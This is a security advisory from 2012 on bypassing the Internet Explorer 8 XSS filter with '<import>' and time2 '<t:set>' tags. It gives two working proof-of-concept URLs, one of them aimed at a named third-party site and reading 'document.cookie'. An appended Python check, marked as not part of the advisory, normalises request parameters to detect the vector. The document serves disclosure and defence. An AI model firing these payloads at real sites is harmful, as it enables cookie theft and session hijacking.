Internet Explorer 8 XSS filter bypass

2012.10.29
Credit: Gainover
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

Note: IE 10 has fixed this issue, and IE8...

-------------------------------------------------

1. A <?import ... > tag can also be written as a <import ...> tag.

<html>
<body>
<div>
<div id="x">x</div>
<xml:namespace prefix="t">
<import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=alert(1)&gt;">
</div>
</div>
</body>
</html>

The code above will execute the script fragment in the "to" attribute. Furthermore, we found that this XSS vector, constructed from the three tags (<xml>, <import> and <t:set ...>), can bypass the IE8 XSS filter.

-------------------------------------------------

POC1: use <import ...>

http://xsst.sinaapp.com/example/1-1.php?page=<div id=x>x</div><xml:namespace prefix=t><import namespace=t implementation=%23default%23time2><t:set/attributename=innerHTML targetElement=x to=%26lt;img%26%2311;src=x:x%26%2311;onerror%26%2311;=alert%26%23x28;1%26%23x29;%26gt;>

Using <?import ...> instead will trigger the XSS filter to intercept our code.

2. Our code should start with "> when we encounter a case like: <input type="text" value="{parameter under our control}">. The "> will trigger the XSS filter, and it will replace some words like 'namespace' and 'attributeName' in our code. My friend @jackmasa (https://twitter.com/jackmasa) (@Sogili in Wooyun.org) gave me a trick to solve the problem: "x> (where x represents any letter) does not trigger the filter.

-------------------------------------------------

POC2:

http://www.53kf.com/product.php?arg=&search="id=><div/id=x>x</div><xml:namespace prefix=t><import namespace=t implementation=%23default%23time2><t:set/attributename=innerHTML targetElement=x to=%26lt;img%26%2311;src=x:x%26%2311;onerror%26%2311;=alert%26%23x28;document.cookie%26%23x29;%26gt;>

That's all. Thanks for the help from my friend jackmasa (@Sogili in Wooyun.org).

Author: Gainover
Group: PKAV .net & Wooyun.org
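A server-side detection check for this vector, added here as an example and not part of the advisory or of any IE code: it normalises a request parameter the way the browser would see it (percent-decoding, character references including the &#11; vertical tab the payload uses as attribute whitespace, whitespace folding) and then flags the #default#time2 import combined with a *:set on innerHTML, whichever of the <import>, <?import or "x> openers is used. The indicator names and the sample values (built from the two POCs above) are this example's own.

```python
import re
from urllib.parse import unquote
NAMED_REFS = {"lt": "<", "gt": ">", "amp": "&", "quot": '"'}

def decode_charrefs(text):
    """Lenient reference decoding. html.unescape() would drop &#11; entirely,
    but IE treats that vertical tab as attribute whitespace, so keep it."""
    def repl(m):
        ref = m.group(1)
        if ref[0] != "#":
            return NAMED_REFS.get(ref.lower(), m.group(0))
        num = int(ref[2:], 16) if ref[1] in "xX" else int(ref[1:])
        return chr(num) if num <= 0x10FFFF else ""
    return re.sub(r"&(#x[0-9a-f]+|#[0-9]+|[a-z]+);", repl, text, flags=re.I)

def normalize(raw):
    """Percent-decode (bounded), decode references, fold ASCII whitespace."""
    text = raw
    for _ in range(3):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return re.sub(r"[\t\n\x0b\x0c\r ]+", " ", decode_charrefs(text)).lower()

# One indicator per building block named in the advisory, plus a check for an
# event handler inside the decoded 'to' value. Indicator names are this example's.
INDICATORS = {
    "xml_namespace_decl": re.compile(r"<xml:namespace\b[^>]*\bprefix\s*="),
    "time2_import": re.compile(r"<\??import\b[^>]*implementation\s*=\s*['\"]?#default#time2"),
    "set_innerhtml": re.compile(r"<[a-z]+:set\b[^>]*attributename\s*=\s*['\"]?innerhtml"),
    "handler_in_to": re.compile(r"\bto\s*=\s*['\"]?<[^>]*\bon[a-z]+\s*="),
}

def scan(raw_param):
    """Return the indicator names found in one request parameter value."""
    text = normalize(raw_param)
    return [name for name, rx in INDICATORS.items() if rx.search(text)]

def is_time2_vector(raw_param):
    """The time2 import plus a *:set on innerHTML is the vector; the rest adds confidence."""
    hits = scan(raw_param)
    return "time2_import" in hits and "set_innerhtml" in hits

# Constructed samples: the parameter value shapes of the advisory's two POCs.
POC1 = ("<div id=x>x</div><xml:namespace prefix=t><import namespace=t implementation="
        "%23default%23time2><t:set/attributename=innerHTML targetElement=x to=%26lt;"
        "img%26%2311;src=x:x%26%2311;onerror%26%2311;=alert%26%23x28;1%26%23x29;%26gt;>")
POC2 = '"id=>' + POC1  # the "x> opener described in section 2
```

Because the match runs on the decoded and whitespace-folded form, the trick of separating attributes with &#11; or of starting with "x> instead of "> does not hide the vector from this check the way it hides it from the IE8 filter.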

References:

http://zone.wooyun.org/content/1411

